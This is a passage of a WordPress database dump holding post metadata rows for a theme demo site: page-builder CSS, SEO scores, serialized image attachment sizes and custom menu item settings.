'portfolio_single_back_to_link','36'),(30346,3389,'mkdf_disable_vertical_header_background_image_meta','no'),(30347,3389,'mkdf_disable_header_widget_areas_meta','no'),(30348,3389,'slide_template',''),(30349,3389,'rs_page_bg_color',''),(30350,3389,'_yoast_wpseo_primary_portfolio-category','84'),(30351,3389,'_yoast_wpseo_content_score','30'),(30352,3390,'_edit_lock','1607275725:1'),(30353,3390,'_edit_last','1'),(30354,3390,'_thumbnail_id','136'),(30355,3390,'mkdf_page_content_behind_header_meta','no'),(30356,3390,'portfolio_single_back_to_link','36'),(30357,3390,'mkdf_disable_vertical_header_background_image_meta','no'),(30358,3390,'mkdf_disable_header_widget_areas_meta','no'),(30359,3390,'slide_template',''),(30360,3390,'rs_page_bg_color',''),(30361,3390,'_yoast_wpseo_primary_portfolio-category','85'),(30362,3390,'_yoast_wpseo_content_score','30'),(30363,3060,'_edit_last','1'),(30364,3060,'rs_page_bg_color','#ffffff'),(30365,3060,'_yoast_wpseo_content_score','30'),(37690,3701,'original_to','stanszoqcjq@demo.com'),(30411,2942,'_edit_last','1'),(30412,2942,'rs_page_bg_color',''),(30413,2942,'_yoast_wpseo_primary_portfolio-category','42'),(30414,2942,'_yoast_wpseo_content_score','60'),(30415,3393,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(30416,3393,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(30417,3394,'_wpb_post_custom_css','.main-home-first-row {\r\n    position: relative;\r\n    z-index: 10;\r\n}\r\n.main-home-second-row {\r\n    position: relative;\r\n    z-index: 20;\r\n}'),(30418,3394,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(30419,3067,'_edit_lock','1607276452:1'),(51294,4239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:645;s:4:\"file\";s:27:\"2018/07/blog-post-img-5.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"blog-post-img-5-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-650x645.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"blog-post-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-600x298.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:298;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"blog-post-img-5-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51295,4240,'_wp_attached_file','2018/07/shop-img-12.jpg'),(51296,4240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-12.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-12-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-12-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-12-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-12-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-12-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-12-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-12-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-12-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51297,4241,'_wp_attached_file','2018/07/map-pin.png'),(51298,4241,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:93;s:6:\"height\";i:93;s:4:\"file\";s:19:\"2018/07/map-pin.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52085,4353,'_menu_item_target',''),(52086,4353,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(52010,2771,'_wp_attachment_image_alt','m'),(52011,2973,'_wp_attachment_image_alt','d'),(52012,2748,'_wp_attachment_image_alt','v'),(52013,2974,'_wp_attached_file','2018/09/landing-print-img-2-1.jpg'),(52014,2974,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:878;s:4:\"file\";s:33:\"2018/09/landing-print-img-2-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-734x650.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-650x878.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-print-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52015,2974,'_wp_attachment_image_alt','d'),(52016,2975,'_wp_attached_file','2018/09/landing-print-img-3-1.jpg'),(52017,2975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:878;s:4:\"file\";s:33:\"2018/09/landing-print-img-3-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-734x650.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-650x878.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-print-img-3-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52018,2975,'_wp_attachment_image_alt','d'),(52019,2976,'_wp_attached_file','2018/09/landing-print-img-6-1.jpg'),(52020,2976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:878;s:4:\"file\";s:33:\"2018/09/landing-print-img-6-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-251x300.jpg\";s:5:\"width\";i:251;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-734x650.jpg\";s:5:\"width\";i:734;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-650x878.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:878;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-print-img-6-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-600x718.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-print-img-6-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52021,2976,'_wp_attachment_image_alt','d'),(52022,2978,'_wp_attached_file','2018/09/landing-img-2-1.jpg'),(52023,2978,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:451;s:4:\"file\";s:27:\"2018/09/landing-img-2-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-650x451.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(30674,3395,'_menu_item_type','custom'),(30675,3395,'_menu_item_menu_item_parent','0'),(30676,3395,'_menu_item_object_id','3395'),(30677,3395,'_menu_item_object','custom'),(30678,3395,'_menu_item_target',''),(30679,3395,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30680,3395,'_menu_item_xfn',''),(30681,3395,'_menu_item_url','#'),(30682,3395,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30683,3395,'_menu_item_icon','null'),(30684,3396,'_menu_item_type','custom'),(30685,3396,'_menu_item_menu_item_parent','0'),(30686,3396,'_menu_item_object_id','3396'),(30687,3396,'_menu_item_object','custom'),(30688,3396,'_menu_item_target',''),(30689,3396,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30690,3396,'_menu_item_xfn',''),(30691,3396,'_menu_item_url','#'),(30692,3396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30693,3396,'_menu_item_icon','null'),(30694,3397,'_menu_item_type','custom'),(30695,3397,'_menu_item_menu_item_parent','0'),(30696,3397,'_menu_item_object_id','3397'),(30697,3397,'_menu_item_object','custom'),(30698,3397,'_menu_item_target',''),(30699,3397,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30700,3397,'_menu_item_xfn',''),(30701,3397,'_menu_item_url','#'),(30702,3397,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30703,3397,'_menu_item_icon','null'),(30704,3398,'_menu_item_type','custom'),(30705,3398,'_menu_item_menu_item_parent','0'),(30706,3398,'_menu_item_object_id','3398'),(30707,3398,'_menu_item_object','custom'),(30708,3398,'_menu_item_target',''),(30709,3398,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30710,3398,'_menu_item_xfn',''),(30711,3398,'_menu_item_url','#'),(30712,3398,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30713,3398,'_menu_item_icon','null'),(30714,3399,'_menu_item_type','custom'),(30715,3399,'_menu_item_menu_item_parent','0'),(30716,3399,'_menu_item_object_id','3399'),(30717,3399,'_menu_item_object','custom'),(30718,3399,'_menu_item_target',''),(30719,3399,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30720,3399,'_menu_item_xfn',''),(30721,3399,'_menu_item_url','#'),(30722,3399,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30723,3399,'_menu_item_icon','null'),(30724,3400,'_menu_item_type','custom'),(30725,3400,'_menu_item_menu_item_parent','0'),(30726,3400,'_menu_item_object_id','3400'),(30727,3400,'_menu_item_object','custom'),(30728,3400,'_menu_item_target',''),(30729,3400,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30730,3400,'_menu_item_xfn',''),(30731,3400,'_menu_item_url','#'),(30732,3400,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30733,3400,'_menu_item_icon','null'),(30734,3401,'_menu_item_type','custom'),(30735,3401,'_menu_item_menu_item_parent','0'),(30736,3401,'_menu_item_object_id','3401'),(30737,3401,'_menu_item_object','custom'),(30738,3401,'_menu_item_target',''),(30739,3401,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30740,3401,'_menu_item_xfn',''),(30741,3401,'_menu_item_url','#'),(30742,3401,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30743,3401,'_menu_item_icon','null'),(30744,3402,'_menu_item_type','custom'),(30745,3402,'_menu_item_menu_item_parent','0'),(30746,3402,'_menu_item_object_id','3402'),(30747,3402,'_menu_item_object','custom'),(30748,3402,'_menu_item_target',''),(30749,3402,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30750,3402,'_menu_item_xfn',''),(30751,3402,'_menu_item_url','#'),(30752,3402,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30753,3402,'_menu_item_icon','null'),(30754,3403,'_menu_item_type','custom'),(30755,3403,'_menu_item_menu_item_parent','0'),(30756,3403,'_menu_item_object_id','3403'),(30757,3403,'_menu_item_object','custom'),(30758,3403,'_menu_item_target',''),(30759,3403,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(30760,3403,'_menu_item_xfn',''),(30761,3403,'_menu_item_url','#'),(30762,3403,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(30763,3403,'_menu_item_icon','null'),(30764,3404,'_menu_item_type','custom'),(30765,3404,'_menu_item_menu_i